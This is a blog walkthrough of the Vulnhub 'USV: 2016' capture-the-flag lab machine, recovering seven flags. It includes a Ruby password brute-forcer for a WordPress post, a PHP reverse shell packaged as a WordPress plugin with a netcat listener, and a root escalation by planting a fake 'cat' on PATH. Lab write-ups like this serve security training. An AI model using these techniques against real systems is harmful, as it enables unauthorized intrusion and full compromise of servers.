This segment of my Vulnhub series covers my walkthrough for the “USV: 2016 (v1.0.1)” game. There are 7 flags to discover in the form of: Country_name Flag: [md5 hash].


Finding Host

As always I started out finding the address of the CTF game:

$ sudo nmap -sn

In my case, the IP was


Service Scan

Next I uncovered which services the game offered:

sudo nmap -p1-65535 -A -T4 -sS

Running this service scan returned way too many open ports. Too many to reflect a real server. A list of each port for reference can be found at the end of this walkthrough. Skimming through the ports revealed something interesting:

Port Service Product Hostname
8100 smtp OpenSMTPD FUZZ_HERE
8101 smtp Hotmail Popper hotmail to smtp gateway FUZZ_HERE

Why did the smtp service state “FUZZ_HERE”? After googling it I found a reference to portspoofing. Nicely done, the author of this game added some troll tech for me to make things harder!

Finding alive ports

With so many ports available I needed to find a way to narrow the scope. I combated the port spoofing by simply doing a Nmap connect scan:

$ sudo nmap -p1-65535 -A -T5 -sT
Port Service Product Hostname
22 ssh OpenSSH
80 http Apache httpd
3129 http-proxy Squid http proxy
3306 mysql MariaDB
21211 ftp vsftpd SevenKingdoms

Apparently “SevenKingdoms” hostname is a reference to Game of Thrones.

Flag 1

Having four ports available, where should I begin? My gut feeling told me SSH.


The welcome banner contained an ASCII dragon. I noticed the string at the bottom, what could that be? By looking deeper into the banner I saw some letters that seemed misplaced. Together they spelt out A-E-S-E-C-B. I had to deal with the AES ECB encryption here.

In order to crack this I headed over to to try my luck. For this to be fruitful I needed a Key. Looking further into the image I saw that tail part of the dragon looked out of place and I decided to use that as the Key.

The settings I used on the site was

AES string:
Key: xxxxx0000000xxxxxx
Bits: 128-bit

These settings decrypted AES string to

Decoded flag
Italy Flag: 0047449b33fbae830d833721edaef6f1

Flag 2

I was a little bit short of information to attack SSH at that moment. Moving on I tried my luck toying with the web server. Accessing it on port 80 yielded no access:


Most CTF’s contain information in the weirdest places. I made sure to check what’s available. At first I looked at the HTML source – nothing interesting there. Perhaps there were something hidden in the HTTP response headers from server? Here I’ve tried if SevenKingdoms path worked:


The X-XSS-Protection header seemed to contain a Base64 string


Decoding this string yielded

Croatia Flag: 0c326784214398aeb75044e9cd4c0ebb

Flag 3

Related to web I saw the server running Squid Proxy on port 3129. I decided to see if I could access the web server through it! I used the FoxyProxy Firefox plugin for this and here’s the configuration I used:

What Value
Proxy IP
Proxy Port 3129
URL pattern **

Your settings may vary. Accessing the site presented me with this landing page:


Inspecting both the HTML source and the HTTP response from web server yield nothing of interest. Perhaps I could move further into the page stack by fuzzing it? For this operation I used the fuzzer in OWASP ZAP.

Setting up OWASP ZAP

Step one: setting up proxy

The first thing I did was to set OWASP ZAP up to use the proxy. It can be done from Tools->Options->Connection dialog:


Step two: establish baseline

Once configured I launched a baseline scan of target by entering the target address and clicked Attack:


Step three: setting up fuzzer

On the right side of OWASP ZAP I right clicked on target and selected Attack->Fuzz…


Which opened a dialog were I:

  1. Marked were to set fuzzing parameter. I did it at the end of the target address as indicated by the colored part next after the final slash in the screenshot below
  2. Clicked on Add, then once more on the Add button in the following dialog box
  3. Selected File Fuzzers from the dropdown and selected dirbuster
  4. When everything was accepted and confirmed, clicked on the Processors … button and just accepted the dialog.
  5. Clicked on Start Fuzzer at the dialog from pt. 1

The following screenshots might cast a light on the process:


Adding processor (note: I had to click on the Generate Preview button for the fuzzer to work).


After a somewhat long run the fuzzer discovered a hidden path named blog. Visiting it I landed on this page:


Analyzing blog

By looking at the blog landing page I found two things of interest:

  • A picture of Hodor stating: I have a message for you!
  • A protected blog post The secret Chapter

First thing first – Hodor! Looking at the path for the picture itself I saw it is /blog/hodor/hodor.jpg. Navigating one step back in Firefox I was with a page stating Hodor has a message for you! which itself is a link to download Zip file (

Downloading and extracting the Zip file revealed a file called hodor. To find out what kind of file it is, I ran the file command on it:

$ file hodor

This is a JPEG file without the file extension!

File information
hodor: JPEG image data, JFIF standard 1.01, resolution (DPI), density 96×96, segment length 16, baseline, precision 8, 480×360, frames 3

Renaming it to JPG gave me a new flag:


String was Base64 encoded:


Portugal Flag: a2663b23045de56c7u96a406429f733f

Flag 4

Remember that protected blog post from Flag 3? It is time to play with it! First I created a dictionary of words from the blog:

$ cewl --proxy_host --proxy_port 3129 --write got.dict

I tried to put this dictionary to use with WFuzz, OWASP ZAP and BurpSuite. Somehow everyone of them crashed. So I wrote my own makeshift Fuzzer to crack this password:

require "net/http"
require "uri"
require "base64"
require "rainbow/ext/string"

target_url = URI.parse(ARGV[0])
fuzzfile = ARGV[1]
blogpage = ""

ENV['http_proxy'] = ''

counter = 0
prevsize = 0 do | fuzzvalue |
    fuzzvalue = fuzzvalue.delete("\n").strip

    cookieheader = { "Host" => "", "Referer" => blogpage, "Cookie" => "wordpress_test_cookie=WP+Cookie+check; wp-postpass_af36d351f0a2a7010d4334f6d3418ed2=%24P%24BliNI6VL3%2F5BjOcRk5x28%2FphGmIAKO1" }

    cookierequest ="#{target_url.path}?#{target_url.query}", cookieheader)
        "post_password" => fuzzvalue,
        "Submit" => "Enter"

    cookiehttp =, target_url.port)
    cookieresponse = cookiehttp.request(cookierequest)

    bloguri = URI.parse(cookieresponse["Location"])
    blogreq =
    blogcookiedata = cookieresponse["Set-Cookie"].split("; ")
    blogcookie = "#{blogcookiedata[0]};#{blogcookiedata[1].split(",")[1]}"

    blogreq.add_field("Cookie", blogcookie)
    bloghttp =, bloguri.port)
    blogresponse = bloghttp.request(blogreq)

    counter += 1

    if blogresponse.body.length != prevsize && prevsize > 0
        puts("#{counter} - Size: #{blogresponse.body.length} Fuzz value: #{fuzzvalue}".color(:green))
        puts("#{counter} - Size: #{blogresponse.body.length} Fuzz value: #{fuzzvalue}")
        prevsize = blogresponse.body.length

Usage (after installing the Rainbow gem):

$ ruby wordpressfuzzer.rb ../output/got.dict

The password form posts to wp-logging.php so I attacked that directly. Eventually my script coughed up the password Westerosi:


Once entered in the password form I saw:


The flag!

String was Base64 encoded:


Paraguay Flag: 4761b65f20053674657c7e6186628a29

Flag 5

The password protected post didn’t just contain the fourth flag, but also some important hints:

  • The mother_of_dragons has a password which is in front of your eyes
  • She uses the Field Training Preparation for her army.

From the hints given I deducted that:

  • I was to target FTP
  • Username is mother_of_dragon
  • Password is “in front of your eyes” (most likely)

I already knew FTP ran on port 21211:


What I did here is that I logged in hitting jackpot with the password, then listed the content and downloaded the two files found:

File Content
.note.txt I keep a hidden note for myself
readme.txt I always forgot passwords, so for my blog account I used my children`s name. -= Daenerys =-

Researching into Danerys character on Game of Thrones Wiki I saw that she had one stillborn child called Rhaego. The hint from .note.txt mentions children’s (plural). Rhaego hint is a bust. However according to various sources on the Net that her dragons would be the only children she will have. This sounds more like it and the dragons are named:

  • Drogon
  • Viserion
  • Rhaegal

The challenge here was s to find the password format which I had to use for attacking the /blog/wp-admin/ login page (I already knew the username). The most obvious route seemed to be to just go ahead and concatenate the names. After some trial and error keeping records in the Sublime editor I finally landed on the password RhaegalDrogonViserion.


Browsing around this WordPress installation I stumbled upon the flag hidden in her profile:


String was Base64 encoded:


Thailand Flag: 6ad7965d1e05ca98b3efc76dbf9fd733

Flag 6

At this time I realized I had to breach WordPress to move on. A reverse shell seemed fit for this. So I copied my favorite PHP reverse shell:

$ cp /usr/share/webshells/php/php-reverse-shell.php shelly.php

First I changed the shell by inserting my IP which the shell should connect back to together with the port (7770). Next I added WordPress plugin wrapper around the shell code:


Plugin Name: Shelly
Plugin URI: http://localhost  
Description: Bla Bla Bla  
Author: Pingmoose
Version: 1.0.1  
Author URI: http://localhost  



Finally, zipped it

$ zip shelly.php

Then I added the plugin to WordPress by simply installing it. I made sure not to activate the plugin before I had my listener up!

Setting up listener:

$ nc -lvp 7770

Activated the plugin to create connection:


Reverse connection:


The target machine seemed a bit unusual. So I dug up what kind of Linux distribution it was:

sh-4.4$ cat /etc/os-release

Which revealed the following

NAME="Arch Linux"
PRETTY_NAME="Arch Linux"

Since this target is based upon Arch Linux it means that web content are served from the /srv/http folder

usv-shell-flagLooking at the content I found a file called reward_flag.txt containing the flag:

String was Base64 encoded:


Mongolia Flag: 6b49c13cccd91940f09d79e142108394

Flag 7

There was another entity in the folder I just found. I examined the file winterfell_messenger by running the strings command on it:


Further investigation:

  • At some point this messenger reads from the /root/message.txt file
  • Running the messenger revealed message.txt file is nowhere to be found
  • Messenger is owned by root:root
  • Messenger run cat not using absolute path. This is likely the best exploitation point

in order to exploit cat I made my own version of it that spawned a Bash shell. Cat command was then added to PATH in order to make winterfell_messenger pick it up:

sh-4.4$ cd /tmp
sh-4.4$ touch cat
sh-4.4$ echo "/usr/bin/bash" > cat
sh-4.4$ chmod a+x cat
sh-4.4$ export PATH=/tmp:$PATH
sh-4.4$ cd /srv/http
sh-4.4$ ./winterfell_messenger

Winterfell_messenger picked it up and it gave me a ROOT shell:


Listed out the content of /root revealed the hidden file .flag.txt which contained the last flag:


String was Base64 encoded:


Somalia Flag: 4a64a575be80f8ffab26b06a958bcf34


If you enjoyed this walkthrough, please share and contact me on Twitter (@reedphish)!


Appendix 1: Service scan

For future reference, the port spoofer responded with these ports and services:

Port Service Product Hostname
1 tcpmux
22 ssh OpenSSH
60 unknown
80 http Apache httpd
81 smtp-proxy Arkoon smtp proxy
808 ccproxy-http
1024 kdm
1025 NFS-or-IIS
1026 LSA-or-nterm
1027 IIS
1028 unknown
1029 ms-lsa
1030 iad1
1031 iad2
1032 iad3
1033 netinfo
1034 zincite-a
1035 multidropper
1036 nsstp
1037 ams
1038 mtqp
1039 sbl
1040 netsaint
1041 danf-ak2
1042 afrog
1043 boinc
1044 dcutility
1045 fpitp
1046 wfremotertm
1047 neod1
1048 neod2
1049 td-postman
1050 java-or-OTGfileshare
1051 optima-vnet
1052 ddt
3129 http-proxy Squid http proxy
3306 mysql MariaDB
4444 ftp Synology CubeStation ftpd a
8100 smtp OpenSMTPD FUZZ_HERE
8101 smtp Hotmail Popper hotmail to smtp gateway FUZZ_HERE
8102 kz-migr
8103 unknown
8104 unknown
10024 unknown
10025 ftp ALFTP
10026 unknown
10027 unknown
10028 ftp
10029 unknown
10030 http Oracle 9iAS httpd
10031 http Allegro RomPager
10032 http Palo Alto PanWeb httpd
10033 unknown
10034 pop3 Dovecot pop3d
10035 soap Fujitsu ServerView Remote Connector soap
10036 http Oracle Application Server 10g httpd
10037 http Agranat-EmWeb
10038 telnet OpenVMS telnetd W
10039 ssh
10040 imap DeskNow imapd
10041 unknown
10042 http RapidLogic httpd
10043 telnet RemotelyAnywhere telnetd
10044 backdoor Subseven backdoor
10045 unknown
10046 imap Arvixe imapd
10047 http JavaHttpServer
10048 http cloudflare-nginx
10049 netstat
10050 http eHTTP
10051 zabbix-trapper
10052 http MiniServ
10053 ident Minidentd or fakeidentd
10054 unknown
10055 http Omniture DC J
10056 unknown
10057 http swcd httpd
10058 ftp TYPSoft ftpd WZqRZFcDN
10059 telnet BusyBox telnetd
10060 unknown
10061 finger ArGoSoft Mail fingerd
10062 http uTorrent WebUI
10063 http Boa httpd
10064 unknown
10065 unknown
10066 unknown
10067 http TiVo To Go httpd
10068 openfpc OpenFPC packet capture
10069 unknown
10070 vnc-http TightVNC
10071 unknown
10072 wifi-mouse WiFi Mouse
10073 telnet Hauppauge MediaMVP telnetd
10074 rtsp Microsoft Windows Media Services
10075 http Xen Cloud Platform httpd
10076 telnet Actiontec GT704-WGB WAP telnetd
10077 http David WebBox httpd
10078 unknown
10079 smtp MDaemon smtpd K-jBp_N
10080 amanda
10081 famdc
10082 james-admin JAMES Remote Admin
10083 pop3 Microsoft Exchange pop3d
10084 gopher
10085 telnet BusyBox telnetd
10086 unknown
10087 unknown
10088 smtp qpsmtpd smtpd eeTmcC-
10089 http RTXCweb
10090 http JVC V.Networks video httpd
10091 unknown
10092 efi-workstation EFI Fiery Command WorkStation
10093 landesk-rc LANDesk remote management
10094 unknown
10095 unknown
10096 ssh Bitvise WinSSHD
10097 http TiVo To Go httpd
10098 upnp NT httpd
10099 http Apple TV http config
10100 itap-ddtp
10101 http PLT Scheme httpd
10102 ftp Dreambox ftpd
10103 ssh
10104 http MiniShare http interface
10105 http Boa httpd
10106 http Microsoft IIS WebDAV
10107 bctp-server
10108 ident widentd
10109 http-proxy Websense http proxy
10110 nmea-0183
10111 http DTA310 VoIP router http config
10112 unknown
10113 ftp Bulletproof ftp server
10114 netiq-qcheck
10115 ftp Welcome
10116 netiq-voipa
10117 ftp
10118 gpsd gpsd
10119 ftp Humax iHDR-5050C DVR ftpd
10120 upnp Orb Media Server UPnP
10121 unknown
10122 http-proxy Cisco ZmffeM http proxy
10123 http Vernier Networks Access Manager http config
10124 ssh OpenSSH
10125 http Glucose WeatherPop Advanced httpd
10126 http Cisco WAPw WAP http admin
10127 sip
10128 bmc-perf-sd
10129 nntp sn nntpd
10130 telnet Nortel BayStack 470-24T switch telnetd
10131 http Sockso personal music player httpd
10132 unknown
10133 netdevil Net-Devil backdoor
10134 http Sun GlassFish Open Source Edition
10135 pop3-proxy Symantec PGP Universal Server pop3 proxy
10136 http OmniHTTPd
10137 pop3 UW Imap pop3d QEK
10138 ssh meow SSH ROOTKIT
10139 ftp Cisco TelePresence MCU EnmW videoconferencing bridge
10140 unknown
10141 unknown
10142 http Ubicom httpd
10143 unknown
10144 unknown
10145 http HP Client Automation httpd
10146 unknown
10147 unknown
10148 unknown
10149 telnet SpeedStream H…o
10150 bitdefender-ctrl Bitdefender Remote Admin Console
10151 http Dorgem webcam server http
10152 backdoor PsychoPhobia backdoor
10153 unknown
10154 unknown
10155 unknown
10156 unknown
10157 http Cisco ACS httpd
10158 ftp Topfield HDPVR satellite decoder ftpd
10159 unknown
10160 telnet
10161 http Pioneer PRO-141 monitor http config
10162 snmptls-trap
10163 http Citrix Access Gateway firewall http config
10164 sourceviewerserver NetBeans Source Viewer Service
10165 vnc-http TightVNC
10166 rtsp Mango DSP AVS Raven-M video server rtspd
10167 http Aethra V3000 VoIP adapter http config
10168 http lighttpd
10169 http Oracle Rapid Install httpd
10170 telnet
10171 nntp Freenet Message System nntpd
10172 http ATR httpd
10173 imap IMAP4rev1
10174 telnet
10175 unknown
10176 unknown
10177 http-proxy Blue Coat ProxySG firewall
10178 telnet HP Tandem NonStop telnetd
10179 http Simple DNS Plus httpd
10180 telnet Windows CE telnetd pqp
10181 http AEWS
10183 http TUX httpd
10184 unknown
10185 pop3 InterMail pop3d
10186 unknown
10187 ftp Titan ftpd
10188 http Thomson SpeedTouch 536i router http config
10189 unknown
10190 http-proxy DeleGate proxy
10191 unknown
10192 telnet
10193 activefax ActFax Communication ActiveFax
10194 g6-remote G6 ftpd remote admin
10195 unknown
10196 rtsp Microsoft Windows Media Services
10197 http Hummingbird Document Manager httpd
10198 telnet Huawei telnetd
10199 synchroedit SynchroEdit request server Ej
10200 http Pioneer PRO-141 monitor http config
10201 ftp
10202 unknown
10203 http GoAhead WebServer
10204 http Azureus Bittorrent tracker httpd
10205 unknown
10206 http WhatsUp Gold httpd
10207 unknown
10208 unknown
10209 unknown
10210 irc UnrealIRCd
10211 http Xen Cloud Platform httpd
10212 rtsp RealMedia EncoderServer
10213 unknown
10214 unknown
10215 ftp Kyocera xB printer ftpd
10216 http Agranat-EmWeb
10217 telnet
10218 http Sony PL LocationFree TV http interface
10219 unknown
10220 upnp Linksys WVC54GC webcam UPnP
10221 unknown
10222 pop3 Microsoft Exchange pop3d
10223 pop3-proxy Trend Micro IMSS virus scanning POP3 proxy IMmQPgdSv
10224 unknown
10225 http Polycom VVX VoIP phone http config
10226 http Linksys WRT300N WAP http config
10227 imap Novell NetMail imapd BaJ
10228 unknown
10229 http Acme.Serve
10230 ftp Kyocera Mita KM-NCvxaoM printer ftpd
10231 http ZyXEL ZyWALL ycgRmuv http config
10232 compuware-lm Compuware Distributed License Management
10233 http Phoenix Labs PeerGuardian httpd
10234 http Barracuda Embedded Web Server
10235 unknown
10236 irc
10237 unknown
10238 upnp MiniDLNA
10239 unknown
10240 klogin Encrypted Kerberized rlogin
10241 http Icecast streaming media server
10242 http Konica Minolta bizhub 423 printer http config
10243 smtp Hornbill Supportworks smtpd cZr
10244 unknown
10245 smtp I2P smtpd q
10246 ttscp Epos text-to-speech control protocol
10247 bittorrent-tracker BitTornado tracker httpd
10248 http uClinux-httpd
10249 http Netscape Enterprise httpd
10250 http Netgear FVLfRoggKaz router http config
10251 unknown
10252 apollo-relay
10253 rtsp Apple QuickTime Streaming Server
10254 telnet E-Tech PSU101 print server telnetd
10255 jabber jabberd instant messaging server
10256 sip T-Com Speedport
10257 pop3pw poppassd
10258 unknown
10259 telnet
10260 axis-wimp-port
10261 http Borland VisiBroker CORBA httpd
10262 ident CacheFlow identd
10263 irc Hybrid ircd
10264 unknown
10265 net-rpc OpenERP NET-RPC
10266 pop3 Eudora Worldmail pop3d piO_fzre
10267 ftp Kiss DP-558 PVR ftpd
10268 telnet Netcomm V300 VoIP adapter telnetd
10269 vnc-http TightVNC
10270 http-proxy Integard filtering http proxy management interface
10271 telnet Ricoh maintenance telnetd
10272 http BNBT Bittorrent Tracker
10273 unknown
10274 http thttpd-alphanetworks
10275 http OCaml httpd
10276 unknown
10277 ftp Sasser worm minimal ftpd
10278 ftp CVX ftpd
10279 domain ISC BIND
10280 http Talk Talk YouView set-top box http config
10281 unknown
10282 smtp-proxy WatchGuard smtp proxy
10283 telnet BusyBox telnetd
10284 ftp bsd-ftpd YG
10285 pop3 qpopper pop3d
10286 http webcamXP PRO http config
10287 telnet foobar2000 remote control telnetd
10288 blocks
10289 redis Redis key-value store
10290 unknown
10291 telnet
10292 telnet SpeedStream …..K. |
10293 unknown
10294 telnet IBM Netcool/Impact telnetd IAtLA
10295 unknown
10296 unknown
10297 imap SCO imapd bRz
10298 telnet BreezeCOM telnetd
10299 unknown
10300 unknown
10301 unknown
10302 ssh
10303 unknown
10304 http Enigma2 Dreambox http config
10305 ident FTPRush FTP client identd
10306 unknown
10307 rtsp Axis 207W Webcam rtspd
10309 telnet F5 BIG-IP load balancer telnetd
10310 http CompaqHTTPServer
10311 unknown
10312 unknown
10313 telnet Konica Minolta Magicolor 2300 DL printer telnetd
10314 telnet Stratus ftServer VTM telnetd
10315 http Oracle Application Server 11g httpd
10316 irc
10317 http Novell-HTTP-Server
10318 http JVC V.Networks video httpd
10319 unknown
10320 unknown
10321 cosir
10322 http Sun GlassFish
10323 telnet Samsung PBX telnetd
10324 http Cisco WAPg WAP http admin
10325 unknown
10326 unknown
10327 unknown
10328 http-proxy CacheFlow http proxy
10329 http BusyBox http
10330 unknown
10331 http GoAhead WebServer
10332 ftp Synology Disk Station DS–SjXjeAgE NAS ftpd
10333 http Zimbra admin http config
10334 unknown
10335 http Mbedthis-Appweb
10336 fiesta-online Fiesta Online game server
10337 http Bukkit JSONAPI httpd for Minecraft game server
10338 http Juniper Networks Secure Access SSL VPN http config
10339 nut Network UPS Tools upsd
10340 ftp Internet Rex ftpd
10341 sip AVM FRITZ!Box
10342 sip-proxy SIP Router
10343 http i3 micro or Linksys SPA400 VoIP gateway http config
10344 pblocald Symark Power Broker pblocald
10345 klogin Encrypted Kerberized rlogin
10346 unknown
10347 telnet
10348 telnet
10349 http oVirt
10350 telnet ZyXEL QjxFV broadband router telnetd
10351 telnet 3Com Linkswitch telnetd
10352 unknown
10353 unknown
10354 http Seahorse http keyserver
10355 ftp A+V Link NVS-4000 surveillance system ftpd
10356 finger Lexmark T642 printer fingerd
10357 telnet Alteon Networks ACEDirector switch telnetd
10358 unknown
10359 ftp Titan ftpd
10360 unknown
10361 http Java 9 http.transport.HttpServerConnection httpd
10362 unknown
10363 unknown
10364 http OpenWrt BusyBox httpd
10365 unknown
10366 unknown
10367 irc UnrealIRCd
10368 smtp Postfix smtpd tWi
10369 unknown
10370 http Apache Tomcat
10371 unknown
10372 ftp
10374 unknown
10375 pbs-maui PBS/Maui Roll
10376 ftp NetSilicon DPO-7300 ftpd
10377 unknown
10378 unknown
10379 http Micro-Web
10380 unknown
10381 irc-proxy psyBNC
10382 http Indy httpd
10383 unknown
10384 telnet
10385 ftp Plan 9 ftpd
10386 unknown
10387 ssh MikroTik RouterOS sshd
10388 unknown
10389 irc Hybrid ircd
10390 unknown
10391 unknown
10392 unknown
10393 unknown
10394 imap Cyrus imapd EEW
10395 smtp Koto Internet Services smtpd IN
10396 ftp IronPort mail appliance ftpd qa+ZSbuXM
10397 unknown
10398 unknown
10399 telnet
10400 unknown
10401 unknown
10402 telnet
10403 unknown
10404 securepath HP StorageWorks SecurePath
10405 http Axigen webmail httpd
10406 unknown
10407 unknown
10408 unknown
10409 unknown
10410 http IP_SHARER WEB
10411 http ShadowBot
10412 unknown
10413 http XBMC http interface
10414 telnet Dell iDRAC6 telnetd
10415 unknown
10416 telnet DirecWay satellite router telnetd
10417 unknown
10418 inetd inetd
10419 telnet Cisco SG300-28p switch telnetd
10420 jsonrpc XBMC JSON-RPC
10421 http QNAP TS-419P+ NAS http config
10422 http HBHTTP
10423 unknown
10424 unknown
10425 unknown
10426 hp-problemdiagnostics HP Problem Diagnostics wVWDnpB
10427 telnet
10428 unknown
10429 http Tomato WAP firmware httpd
10430 unknown
10432 telnet
10433 smtp-proxy ESET NOD32 anti-virus smtp proxy gPRHqDyVa
10434 unknown
10435 H.323-gatekeeper GNU Gatekeeper
10436 nntp nntp//rss nntpd
10437 unknown
10438 unknown
10439 http Cherokee httpd
10440 netasq-admin Netasq firewall admin
10441 nntp Typhoon nntpd
10442 unknown
10443 http WMI
10444 cisco-lm Cisco CallManager license manager
10445 istat istatd server for iStat iPhone app
10446 smtp-proxy Smart-Soft spam filtering smtp-proxy
10447 rtsp Sanyo VCC-HD2300 webcam rtspd
10448 smtp PSCS VPOP3 mail server nBDWX
10449 http WindWeb
10450 http 3Com OfficeConnect wireless router http config
10451 http BaseHTTPServer
10452 http Surgemail webmail
10453 smtp smtpd S+
10454 unknown
10455 unknown
10456 unknown
10457 unknown
10458 http Snom _s VoIP phone http config
10459 http Linksys SRW224 gigabit switch http config
10460 h2 H2 database
10461 http cloudflare-nginx
10462 http Java 4536 http.transport.HttpServerConnection httpd
10463 unknown
10464 http Panasonic Ws webcam http config
10465 unknown
10466 unknown
10467 ovhcheckout OVH OvhCheckOut CBe
10468 http Novell NetWare enterprise web server
10469 unknown
10470 unknown
10471 telnet D-Link DSL-2640B ADSL router telnetd
10472 telnet D-Link DSL router telnetd
10473 ftp ABB Robotics ftpd
10474 unknown
10475 unknown
10476 smtp Trend Micro ESMTP
10477 http Altavista Enterprise Search httpd
10478 ftp Merak ftpd
10479 ssh AudioCodes MP-124 SIP gateway sshd
10480 unknown
10481 unknown
10482 pop3 Code-Crafters Ability Mail Server pop3d Vt
10483 unknown
10484 ftp IBM NPS 540+/542+ print server ftpd
10485 mpd Music Player Daemon
10486 http-proxy Blue Coat ProxySG firewall
10487 smtp
10488 telnet Cayman Gatorbox router telnetd
10489 http Gordian httpd
10490 tcpwrapped
10491 cddbp freedb cddbp server KTOKPYLd
10492 http micro_httpd
10493 pop3 DynFX pop3d Yu-RPv
10494 http Sun GlassFish
10495 unknown
10496 telnet
10497 unknown
10498 unknown
10499 unknown
10500 ftp OKI BVfqDLijD VoIP adapter ftpd JrbTlXhd
10501 nsclient NSClient++
10502 unknown
10503 http Agranat-EmWeb
10504 http Zimbra http config
10505 http TRENDnet TV-IP110W webcam display httpd
10506 ftp Verteiltes Printen und Plotten ftpd
10507 irc-proxy dirkproxy
10508 http Mono-HTTPAPI
10509 netstat
10510 unknown
10511 telnet Cisco 1601R router telnetd
10512 unknown
10513 domain ISC BIND
10514 http OpenPegasus CIMServer
10515 http Ninja Blocks home automation httpd
10516 xns Relax XBOX file server
10517 http chat server httpd
10518 ftp wzdftpd
10519 whois rwhois LuYSinggu
10520 ssh FortiSSH
21211 ftp vsftpd SevenKingdoms